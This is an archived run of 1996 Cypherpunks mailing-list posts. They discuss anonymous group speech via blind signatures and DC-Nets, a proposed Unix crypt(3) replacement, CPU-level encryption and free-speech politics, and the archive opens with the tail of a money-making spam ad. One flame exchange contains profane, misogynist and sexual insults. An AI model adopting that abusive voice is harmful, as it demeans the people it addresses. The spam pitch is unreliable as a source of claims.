and explains precisely why entirely new methods of doing business are
necessary and are evolving.  Your thinking about money, business,
success and your own future will be challenged by this message!

                 (303) 480-5841 - 24 hours
                    ASK FOR TODD's TAPE

                   J. Jackson Associates
             Income Diversification Strategies
                  Parker, Colorado  U.S.A.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 17 Nov 1996 08:37:47 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: AGA'S LIMITED VOCABULARY
In-Reply-To: <Pine.SUN.3.91.961117072848.20717D-100000@crl7.crl.com>
Message-ID: <Pine.LNX.3.95.961117112938.2235C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Sandy Sandfort wrote:

> Date: Sun, 17 Nov 1996 07:45:17 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>
> To: aga <aga@dhp.com>
> Cc: freedom-knights@jetcafe.org, InterNet Freedom Council <ifc@pgh.org>,
>     cypherpunks@toad.com
> Subject: Re: AGA'S LIMITED VOCABULARY
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks and others,
> 
> On Sun, 17 Nov 1996, aga wrote:
> 
> > Now just one moment cunt. 
> 
> Colorful, yet sadly ineffectual.  
> 
> > This ain't cyberpunks.
> 
> No, it's Cypherpunks (and others).  
>          ^^^^^^^^^^^

o.k., a fucking typo.  I make it often, because there
is also an alt.cyberpunks newsgroup, so what the fuck...

> > I never joined that motherfucking list. 
> 
> Perhaps you are laboring under a misconception.  Cypherpunks is
> about the use of technology to protect privacy.  Perhaps you 
> were confusing it with that other list you are on:
> alt.sex.yourmother.
> 

No, it is your mother I have been fucking.

> > If you want to talk to me, you dump the motherfucking list. 
> > That fucking list is a waste of time, and I ain't going to
> > reply to any of those assholes any more.
> 
> Let me guess; you weren't an English major, right?
> 

Hey stupid motherfucker, you still have the cypherpunks mailing
list in the header.  Don't you know how to listen?

> > If you want to talk to me, you go to the Freedom-Knights
> > or the InterNet Freedom Council ONLY.
> 
> Thanks for your suggestion.
>  

And ai am telling you that you get no more responses to any
commo with the cypherpunks list in the header.

dig?

> > What year did you graduate from Law School?
> 
> Irrelevant, but it was 1975.  More importantly, though, when did
> YOU graduate from law school?
>  

1975.  And my school was better than your school.

I was the fucking class President in Law School.  We
fucked on Library tables at Pitt.  Where the fuck did
you go to school?

> > Again, we dump the stupid fucking list, or I don't talk
> > with you any more.
> 
> Kind of funny that you included Cypherpunks in YOUR reply, but
> don't want me to.  I guess you prefer having a captive audience
> of your cronies.  "Freedom Knights" yeah, right.  
> 

no stupid, as I told you, I do not chop headers.
I just will refuse to reply to you any more.

> So given your above ultimatum, I guess you are going to weasle
> out of sharing your vast legal knowledge with us as per my 
> request.  To wit:
> 
> > > As a favor to me and other's on the list who would like to know
> > > as much as "Aga" does about the *common-law of cyberspace* I ask
> > > "Aga" to please share his knowledge with us.  For starters, a
> > > list of the most relevant appelate cases embodied in the *common-
> > > law of cyberspace* would be appreciated.
> 
> What a pity.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

You will have to contact the Law Systems Institute for the answers to
your questions.

no more stupid fucking cypherpunks list, PERIOD.

-aGod






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 17 Nov 1996 11:37:36 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: The Utility of Privacy
Message-ID: <01BBD47B.EC679D60@king1-22.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Hal Finney

You suggest that the main motivation which someone might have for protecting privacy is that they are engaged in some illicit activities:

page 45: "Why should I really care if someone sees this?  I have nothing to hide."
.....................................................


This statement from David Brin impressed me with the consistency of a certain way of thinking that some people have:

          "I think that having a minimum standard of living is good, therefore everyone should be coerced to contribute to the general welfare."  On the other hand,  "I myself have nothing to hide, therefore no one should be concerned (read: permitted) to do so."

The issue for them in regard of what everyone should/should not do, is whether anything is logical as far as they themselves can see - and the logic revolves around what they themselves think is right;  the extent of their own vision is considered sufficient to determine the parameters of everyone else's life & actions, and therefore sufficient cause to have their measures imposed over all.

But this letter of Hal's brought up an important point:   that even if a person has nothing to hide, it is not the openness or closedness of information which is of concern, but the *responses of others* to that information.    

When an individual wants to live a free & open life, they expose themselves to dangers.   In order to be free to roam, they must have a way to protect themselve from all manner of destructive influences  -  the weather, predatory animals, vicious strangers, etc.    There must be a way to protect what is one's own in order to preserve it.   If it was easier for everyone to defend themselves against attacks on their person or reputation, maybe there would not be as much concern about privacy.   Perhaps if a person could "get away" from others, could continue to have a normal life without too much disruption, once some exciting bit of info was out in public, if they could maintain command over the effects upon their life despite living in a fishbowl, then no one would worry quite as much (although the principle of personal control over one's property remains the same).   But in the meantime, we have but few ways to protect ourselves under the centralized arrangement for protection (police, defense agencies).   

Anyone in a government position is aware of how their public expressions can result in public outcries against them; the secret agencies protect their information files because of what "the enemy" would *do* if they found out about these - even if the agency itself does not consider its activities immoral.

If Information is like munition, privacy is like defense - it is a form of self defense.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 17 Nov 1996 08:44:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: GIV_eus
Message-ID: <1.5.4.32.19961117164212.006da178@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-16-96. WaPo:

   "Air Force Halts Merger of SAIC and Aerospace. Feared
   Change Could Affect Spy Program."

      Aerospace has analyzed all aspects of the nation's
      super-secret satellite and rocket programs, as well as
      space companies' most sensitive proprietary data. The
      Air Force's clubby classified space office feared
      changing Aerospace's status could disrupt operations.
      Many defense contractors have complained about such
      feared contracts for insiders, begging: god, give us.

   -----

   http://jya.com/giveus.txt  (4 kb)

   GIV_eus







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 17 Nov 1996 11:43:50 -0800 (PST)
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Members of Parliament Problem
Message-ID: <v02140b05aeb518d83c92@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:39 PM 11/17/1996, Simon Spero wrote:
>On Fri, 15 Nov 1996, Rich Graves wrote:
>>Peter Hendrickson wrote:
>>> There are times when one wishes to speak anonymously, yet speak
>>> as a member of a group.

>> You either need to trust a shared server to know and then blind your
>> identity, or trust the people with whom you share a secret key not to
>> give that key to non-group members.

> Why not use  blinding for obtaining the certificate?

> Create a number up public/private key pairs, blind them, then do the
> cut-and-choose thing with the security officer. He signs the blinded key,
> then returns it. Unblind the remaining pubic key, and you've got a public
> key with the appropriate signature on it.

Okay, this would work.  But, it requires that all (or at least many) of the
Members of Parliament cooperate.  If not, then the security officer will
be able to make very good guesses about who is speaking.

Parliamentarians may not cooperate for a variety of reasons.  They may
not wish to be attacked by terrorists for the words of others.  They
may believe that cowardice is not to be encouraged.  They may not believe
in anonymity.  It might be too hard for them.

What I would like to see is a method which relies only on published
public keys and no other cooperation from the people who are (more
or less) being used as shields.  This may be impossible.

(A number of people have posted references to other ways of doing
this.  I have yet to track down the references they gave so I don't
know if any of them fit the bill.)

Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 17 Nov 1996 09:37:09 -0800 (PST)
To: deviant@pooh-corner.com (The Deviant)
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117172527.2314A-100000@random.sp.org>
Message-ID: <199611171732.MAA05948@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Unless you're running yp, or if your wu-ftpd leaves a core
with the password entries still in memory, or sendmail can be used to
read any file on the system...

	Belt *and* suspenders, and a lot more simplicity than wu-ftpd
or sendmail offers you.

Adam
The Deviant wrote:
| On Sun, 17 Nov 1996, Adam Shostack wrote:
| > The Deviant wrote:
| > | On Sat, 16 Nov 1996, Joshua E. Hill wrote:
| > | > 	I'm trying to think of a function to replace UNIX's crypt(3).  
| > | > My design criteria are as follows:
| > 
| > | Why? UNIX passwords with password shadowing are as secure as any password
| > | system is going to get.  If your security holes are with passwords, its
| > | because your admin is to lazy to install needed security provissions, not
| > | because the system of checking passwords is bad.
| > 
| > 	A longer salt would make running crack against a large
| > password file slower.
| 
| While thats all well and good, it shouldn't be necisary.  If passwords are
| shadowed, one must have root access before one can run crack against the
| password list, at which time it is innefective.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 02:41:45 -0800 (PST)
To: hyperlex@hol.gr>
Subject: Re: Does John Gilmore...
Message-ID: <199611171440.MAA29860@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 ðì 17/11/1996 -0500, Black Unicorn wrote:
>The problem with people too used to dictatorships is that they grow
>so accustomed to taking those favors and incentives which are dictated to
>them that the freedom (and responsibility) of "financial gain" seem like
>too much work.


Boy oh boy!!!! :-) Financial Gain being "too much work"??? :-)

Hey dude, I work for myself, you know. Ever since childhood, I learned
how not to rely on ANYBODY.

I experienced no "favors" nor "incentives" whatsoever, all my life.
The taxation here is designed to drain the blood of all SMALL businesses
(like mine) and favor the big businesses.
There is very poor welfare here, too. America is almost... socialist
in some respects compared to the Greek welfare state.

Your 'model' of what's going on is more appropriate for the Russians
and the Eastern Block (former) dictatorships, in which case I agree! :-)



>The free market will ever be the only real path to free speech, because,
>in essence, it is free speech.

The free market is the _precondition_ for free speech. But Free speech
does NOT necessarily follow from it. What happened in GREECE and CHILE
in fact is a living proof of this: Such countries had ENTIRELY free
market and NO FREE SPEECH. This is right-wing fascism, as you know.
I hope you agree with these clarifications. I don't see why not...



>Much easier to just work for food.  "The all-knowing General Pinoriega
>would have given us money if we needed it."

The 'all-knowing' dictators of Chile (installed by US involvement)
gave NO money to ANYBODY (but big businesses and American corporations).

As for the Nicaraguan case, the scandal of the C.I.A. financing the
contras using drug-money from selling drugs to American Blacks has
been thoroughly exposed in the rest of the world.

The only 'all-knowing' philanthropists around the world have been
the Stalinist lunatics who are nowdays replaced by (more 'professional'
Mafiozos).

You should be glad to be American, in fact! :-)
(At least you are ruled by the Trilateral Commission; the Mafia plays
 only a secondary role in your politics). :-)




>Of course the result is an increased dependence on the state.


We never run out of saliva spitting on the face of the (Greek) state
over here. Same is true all over the world...



>Market economies which approach true "free market" status provide no
>foothold for regulation.  You cannot really have one without the
>other.

This is a big discussion. The free market _is_ the only way. I agree.
However, as I explained in another (private and humourous) posting,
for instance, I am a winter-swimmer, and use the facilities of a beach
run and owned by the State here in Greece, which will probably CLOSE
DOWN, as soon as it is privatised. At the moment, it's a gift to us
-10 or 20 'winter-swimmers' operating at a loss, not a profit. One
must be on guard for extreme views, neo-liberal or otherwise)... :-)



>(Note the coming backlash against free speech and free markets in
>the United States).

I am in solidarity with your worries, and in favour of both.
But... Sometimes one does not 'automatically' imply the other.



>Free speech does not, however, require that all speech be universally
>broadcast to each and every citizen on the planet free of charge.  That's
>"subsidized speech."

How much should I be charged for every word I utter?  In 1990 I was being
PAID for every word I wrote. Not so anymore! :-) :-)
At least you could afford (as the English say)... 1 penny for these
thoughts! ROTFL!!!! :-)


>Consider long and hard if that is the path that you would like to take.


Me? I voluntarily waste my time, dude, to write my opinions for free! :-)
It's the last thing I do for free, after some rare friendships
and other rare precious things in life.  Don't we al have such things? :-)

If we don't write _some_ opinions for free we'd all become... whores
waiting for the next pimp to exercise 'list-owner's rights on our speech.
Or get bribed to tell lies, and so on! :-) :-)

Perhaps my clarifications helped.
George


P.S.
In Logic, Complete Systems are Consistent, and Consistent Systems
are Incomplete. Thus, 'extreme views' of any kind are impractical.
(theorem of Goedel in Logic and Mathematics applied in practice).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Bostick <abostick@netcom.com>
Date: Sun, 17 Nov 1996 13:07:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE]  Want to know about this "aga" character?  Read the Grubor FAQ!
Message-ID: <328F7BDD.D1F@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In case you aren't clued in enough to know, "aga@dhp.com" is none other 
than John Grubor, well-known Usenet Kook Of The Month winner for
November, 1995.  He *cannot* be reasoned with.  Don't even try. He
makes Dimitri Vulis appear sane, calm, and rational.

Read the Grubor FAQ, http://kendaco.telebyte.com/dharland/Grubor.FAQ.html 
for more details.

Alan "pseudonum of the LYING FORGER PETER VOROBIEFF!!!!1!" Bostick
-- 
Alan Bostick               | You know those chemicals women have in them,
                           | when they've got PMS? Well, men have those very
mailto:abostick@netcom.com | same chemicals in them *all the time*.
news:alt.grelb             |           Margaret Atwood, THE ROBBER BRIDE
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 02:59:57 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611171458.MAA00739@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 05:51 ðì 17/11/1996 -0500, Tim Scanlon wrote:
>George A. Stathis wrote:
>> This was my objection also inside the F-K list, for _some_ of the postings
>> in the past, but none of these postings was connected with acts of
>> censorship, or with "sweeping generalisations" without evidence. On several
>> occasions that I searched and found who or what they were talking about,
>> I discovered they were talking about people whose activities were indeed
>> horrifying (forged cancellations etc) and who also fought back.
>
>Horrifying eh? Hmm I found this just a bit to priceless to resist.
>I guess it falls under the old 'but I'll defend your right...' way
>of looking at things...
>
>In any case, here you go, this is the latest contribution of software
>from Dimitri to the values of freedom of expression and non-censoring
>& all that blather.
>
>#From Phrack 49, file p49-09 published this month:
>                            .oO Phrack Magazine Oo.
>
>                        Volume Seven, Issue Forty-Nine
>                        
>                                 File 09 of 16
>
>                          by Dr.Dimitri Vulis (KOTM)
>
>               A Content-Blind Cancelbot for Usenet (CBCB)
>
>And what follows, is Dr. Dimitri, defender of freedom of expression,
>champion of the anti-censors on the net, posting code to the world to
>engage in exactly those activities that everyone has been ranting about
>as being so utterly "horrifying (forged cancellations etc)" as it were.
>
>Amusing to say the least.
>
>Tim

Well, this is why we _NEED_ this discussion; we _NEED_ Dimitri to explain
his ideas and his critics ALSO to explain his ideas.

My guess is that Dimitri's 'CANCELBOT' is intended to remove pure spam.

A little while ago, I received Spam from the same source an 8th time.
It even automatically replied to my... complaint AS IF it was not a
complaint but a request for info, and it also... forged my E-mail
address.

If Dimitri Vulis (and others) possess the technical genious to relieve
us of such very annoying spam-problems, I don't see at all how this
contradicts Free Speech, or the right of people to speak when invited
to open meetings.

In any case, I am extremely greatful for the info, and would appreciate
the full text and the sources of it.

Cheers
George





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sun, 17 Nov 1996 13:05:48 -0800 (PST)
To: minow@apple.com
Subject: Re: Computer CPU chips with built-in crypto?
Message-ID: <199611172105.NAA04230@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Martin Minow <minow@apple.com>
> I'm not sure if I can answer this but, at last week's SF cypherpunks
> meeting, an Intel engineer asked whether there might be any interest
> in a computer chip with some sort of encryption mechanism built
> into the chip. As I understand it, this chip would process an
> encrypted instruction stream. I.e., it could not execute a program
> unless the "key" for that program was first loaded into the chip.
>
> An interesting idea: does anyone have more information?

This sounds like something which might be used in a set-top-box or
"information appliance" application where pay-per-use programs would
be loaded from a CDROM or network connection.

People have been dreaming about pay per use software for many years.
It is a similar idea to the "mini application" concept which would
replace the monolithic super-apps, the Microsoft Words and the giant
do-everything web-browsers/newsreaders/mail-clients, with small, single
function utilities.  This is part of the idea behind Apple's OpenDoc
and Microsoft's OLE.  In the same way, instead of buying a big program
for hundreds of dollars, you'd just download and use the functionality
you needed for a small fee.

Yet in practice it is not clear whether either of these trends will have
any market success.  Monolithic applications seem to be doing very well,
with more integration being the trend, not less.  And the whole idea
of introducing metering to a market which is used to paying just once
for access is one which is bound to meet resistance.  Look at AOL which
is going to single-charge unlimited access to the net.

So in both cases the trend looks to be going in the opposite direction.

Another possible application for the built in encryption is software
piracy protection.  You'd unlock software for your CPU but it would
not run on anybody else's without a different key code.  Here again
there is not much benefit to the end user, unless software prices come
down dramatically when this device is used.  But otherwise the computer
manufacturers are selling computers which have features which will limit
the powers of the buyers, and having to sell them more expensively to
boot because of the special chip.  In these days of razor thin profit
margins in the PC business it is hard to see how this will sell.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Sun, 17 Nov 1996 13:12:08 -0800 (PST)
To: Tim Scanlon <tfs@adsl-122.cais.com>
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611172111.NAA04310@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


[Multiple CC's trimmed, I don't think anyone at msn.com cares...]

> #From Phrack 49, file p49-09 published this month:
...
>                                  File 09 of 16
>                           by Dr.Dimitri Vulis (KOTM)
>                A Content-Blind Cancelbot for Usenet (CBCB)
...
> And what follows, is Dr. Dimitri, defender of freedom of expression,
> champion of the anti-censors on the net, posting code to the world to
> engage in exactly those activities that everyone has been ranting about
> as being so utterly "horrifying (forged cancellations etc)" as it
> were.

You call yourself on cypherpunks, and you blithely assume that a
Phrack author actually signs his real name? 

Either I thought you guys were *real* hackers and you aren't, or
this is a very funny troll.
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

                  "Better to be safe than to be sorry" 
   is a remark of value only when these are the actual alternatives.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 03:15:38 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore...(CORRECTION)
Message-ID: <199611171514.NAA01626@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 ìì 17/11/1996 -0200, George A. Stathis wrote:
>In Logic, Complete Systems are Consistent, and Consistent Systems
>are Incomplete. Thus, 'extreme views' of any kind are impractical.
>(theorem of Goedel in Logic and Mathematics applied in practice).

Boy oh Boy! time to flame myself this time:
"Complete Systems are INconsistent, and Consistent Systems
 are INcomplete". At least in the Predicate Calculus.

This is why I look forward to Dimitri explaining his 'Cancelbot'
in detail. It's possible that the _misuse_ of such an innovation
would be against the original goal (of Spam-elimination etc).

In any case, while you all go to sleep, it's me for me to do some work!
:-)
George





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Sun, 17 Nov 1996 13:16:55 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Does John Gilmore...
Message-ID: <199611172116.NAA04343@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> The free market will ever be the only real path to free speech, because,
> in essence, it is free speech.
> Free speech does not, however, require that all speech be universally
> broadcast to each and every citizen on the planet free of charge.  That's
> "subsidized speech."

Given that the free market rule is "he who has the money makes the
rules", please explain how anything less than "subsidized speech" (as
you put it) is anything close to free speech?

[For those who's assumptions rule their perception: I am *not* arguing
that all speech should be subsidized. I am merely pointing out that
the organization that is spending the money to broadcast is
controlling the speech, hence it is *not* free speech in terms of
freedom or cost.]
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

                If you want to get rid of somebody, 
            just tell them something for their own good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Sun, 17 Nov 1996 13:24:02 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Giving Kill Files a Workout...
Message-ID: <199611172123.NAA04405@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Dimitri Vulis writes about unwanted noise:
> They feel compelled to silence it altogether. They claim altruistically
> that they don't want the noise to bother anyone else, such as the clueless
> newbies who keep subscribing to this mailing list and don't know how to
> use mail filters. (Sandy Sanford's concern for them was soooo touching...)

Misplaced altruism is one of the primary causes of social injustice,
authoritarian regimes, and security measures.

It is not possible to be "altruistic" until one realizes that one
doesn't know what true "altruism" is. 
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

    Don't follow in the footsteps of the ancients, seek what they sought.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 13:19:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b05aeb518d83c92@[192.0.2.1]>
Message-ID: <v03007801aeb52de9d3b0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 AM -0800 11/17/96, Peter Hendrickson wrote:

>What I would like to see is a method which relies only on published
>public keys and no other cooperation from the people who are (more
>or less) being used as shields.  This may be impossible.
>
>(A number of people have posted references to other ways of doing
>this.  I have yet to track down the references they gave so I don't
>know if any of them fit the bill.)

It sounded to me from your initial statement of the problem that this is
the canonical Dining Cryptographers Problem: a group of N persons wishes to
allow communication from one of their number without any possibility that
the message can be traced to a single one of them.

There are of course numerous issues to be dealt with in a DC-Net, some
discussed in Chaum's orginal paper (available at one time at the
Cypherpunks ftp site), some discussed in the followup papers in "Eurocrypt"
some years back, and some discussed by several of us on this list (with,
perforce, not as much academic rigor as the academic papers have).

* Collusion. It will _always_ (repeat: always) be possible for N -1 of the
folks to conspire to identify the member sending the message. No
cryptographic system can possibly prevent that, for basic ontological
reasons.

(For example, if the members of Parliament suspect MP Peter H. to be the
source of anti-British opinions, they may compare notes, agree that none of
them sent the message, and thus know that Peter H. sent it. Of course, can
they be trusted? A meta-issue. But such are the ways even DC-Nets can be
thwarted...by the members themselves. This is beyond cryptography.)

However, the costs and difficulties in collusion to identify a sender can
be made quite high by having multiple DC-Nets, such that collusion would
have to span a critical subset of them.

* Denial of service. Some members of the DC-Net(s) may choose not to
participate, or to "lie" (in terms of doing their XOR operations with their
neigbor), etc. The various DC-Net papers deal with these problems.

For the specific example Peter cites, of a member of Parliament who doesn't
like the possibility of anonymity....well, he wouldn't be part of the
DC-Net would he? Generally, there are no cryptographic solutions that will
encompass the case where some member wants to speak anonymously, but no one
else does. If a message originates from "someone in Parliament," but only
one member of Parliament is set up to speak anonymously, then of course by
simple elimination he is the speaker. As before, this is beyond any
cryptographic solution.

And as soon as N are interested, where N > 1, the possibility of a DC-Net
is present. Obviously, the bigger N is, the better.

There may be easier to implement approaches, such as the ones people have
proposed involving distribution of "voting tokens" (blinded, for anonymity).

Anonymous voting is, in fact, formally equivalent (with some hand-waving
about some details) to the problem of untraceable speaking. The example
Peter cited, of a MP wanting to "speak anonymously" is equivalent to
wanting his vote--on Northern Ireland, for example--to be anonymous.

(Chaum was studying anonymous electronic voting protocols, of course.)

A simple form of this is "blackballing." Members have white and black
balls, and place one of the balls in an urn. Properly implemented, this
gives anonymity.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 17 Nov 1996 10:39:16 -0800 (PST)
To: Rich Graves <rcgraves@ix.netcom.com>
Subject: Re: Members of Parliament Problem
In-Reply-To: <328D0476.4C3B@ix.netcom.com>
Message-ID: <Pine.SUN.3.91.961117133019.11544A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Rich Graves wrote:

> Peter Hendrickson wrote:
> > 
> > 
> > There are times when one wishes to speak anonymously, yet speak
> > as a member of a group.
> 
> You either need to trust a shared server to know and then blind your 
> identity, or trust the people with whom you share a secret key not to 
> give that key to non-group members.

Why not use  blinding for obtaining the certificate? 

Create a number up public/private key pairs, blind them, then do the
cut-and-choose thing with the security officer. He signs the blinded key,
then returns it. Unblind the remaining pubic key, and you've got a public
key with the appropriate signature on it. 

Simon

 ---
If I can get my key back,   it's Key Recovery
If you can get my key back, it's Key Escrow





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 17 Nov 1996 13:37:45 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117172527.2314A-100000@random.sp.org>
Message-ID: <Pine.LNX.3.95.961117133536.1181L-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, The Deviant wrote:

> On Sun, 17 Nov 1996, Adam Shostack wrote:
> > 	A longer salt would make running crack against a large
> > password file slower.
> 
> While thats all well and good, it shouldn't be necisary.  If passwords are
> shadowed, one must have root access before one can run crack against the
> password list, at which time it is innefective.

I couldn't disagree more (not that I necessarily agree or disagree with
Adam's approach). Sure, once you have root you don't need any other
access, until the hole is found and closed that gave root in the first
place. After that, that /etc/shadow file with the lousy passwords (that
seem inevitable with folks using /etc/shadow as they get complacent
with a false sense of security) provide the would-be cracker with a set
of local accounts to (try to) break in again. Local accounts are
definitely an advantage should you be looking for way to break any Unix
variant.

The moral of the story is: ALWAYS ensure that whatever passwords you
have on your unix system are not beatable by crack, don't rely upon
hiding them because if you are wrong you are in it up to your neck!

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Sun, 17 Nov 1996 14:11:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Experience Microsoft Site Builder Workshop Live!
Message-ID: <3.0.32.19961117140504.0069c8cc@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft Site Builder Workshop Live!  ( apprx 2.5 hours )

via Real Audio at  	http://ww3.audionet.com/events/microsoft/

what you need:
	The RealAudio Player
       At least a 28.8Kbps connection to the Internet 
       A screen resolution size of 800 x 600 pixels 


::
Archived On November 13th From The INFOMART In Dallas, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Date: Sun, 17 Nov 1996 14:17:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: RFC: A UNIX crypt(3) replacement
Message-ID: <199611172214.OAA15330@hyperion.boxes.org>
MIME-Version: 1.0
Content-Type: text/plain


I have gotten a lot of e-mail that has said basicly the same things:

	1) Don't try to redo UNIX crypt(3), S-KEY (Secure Shell, etc.)
	is better.

Well... This is most certainly the case.  And if I could force the
people in my user base to use one of these alternatives, I would.
Unfortunately, I cannot.  A fair number of the people who use the
systems that I administer log on through dumb terminals.  If I can't
successfully teach them not to hit the "Ctrl-S" key, how am I going
to teach them to do IDEA encryption in their heads?  Or MD4 hashes
for that matter?  The fact is that if I tried to use S/KEY everyone
would print out their key list for the month, and then promptly
loose it, and regenerate a new one.  Gee... Wouldn't that be secure.
I have to stay with the one password system.

	2) If your administer was worth his weight in spit, you
	would have a shadow password system, and the preexisting
	crypt(3) function would be good enough for you.

Actually, I _am_ the administrator, and I am worth my weight in 
spit.  Rather, I do use a shadow password suite.  However, as 
security professionals, you must know that it is not whether an 
attacker can break into your system, but how long it takes.  Once
there, it is not whether the attacker can gain root, it is how long
it takes (how many of the holes have been patched, and how many are
even known about).  And then to the password file. It is not whether
the attacker can crack _all_ the passwords, it is how long it takes.  
With this algorithm, I hope to increase the last of these values.

	3) The algorithm is too complex (or too simple)

The algorithm that I proposed makes use of a NMAC as a basic 
cryptographic primitive.  The security analysis of the algorithm
should follow the same lines as a hash; that is: if the basic
operator is secure, then the chaining of the operator is secure.
The NMAC is provably as secure as the key used and the underlying
hash function.

I did everything that I could to maintain simplicity throughout the
algorithm's design.  I realize that a simple algorithm is easier to
analyze and check for security.  A fair bit of the complexity is to
make it so that the algorithm is actually a NMAC. 

	4) Why don't you use FreeBSD's MD5 based crypt(8) 
	replacement?

I didn't like FreeBSD's MD5 drop in, because it lacked any
security analysis, and complexity of the algorithm prevented
any serious attempt at said analysis.  It also uses MD5, which
has not held up well to the ravages of time.  The recent
papers on easier ways to find collisions in MD5 did _not_ give
me an attack of the warm-and-fuzzies.  I would like to make use 
of an algorithm that is still thought to be secure.

			Joshua


-----------------------------Joshua E. Hill-----------------------------
|                            Thoreau's Law:                            |
|      If you see a man approaching you with the obvious intention     |
|           of doing you good, you should run for your life.           |
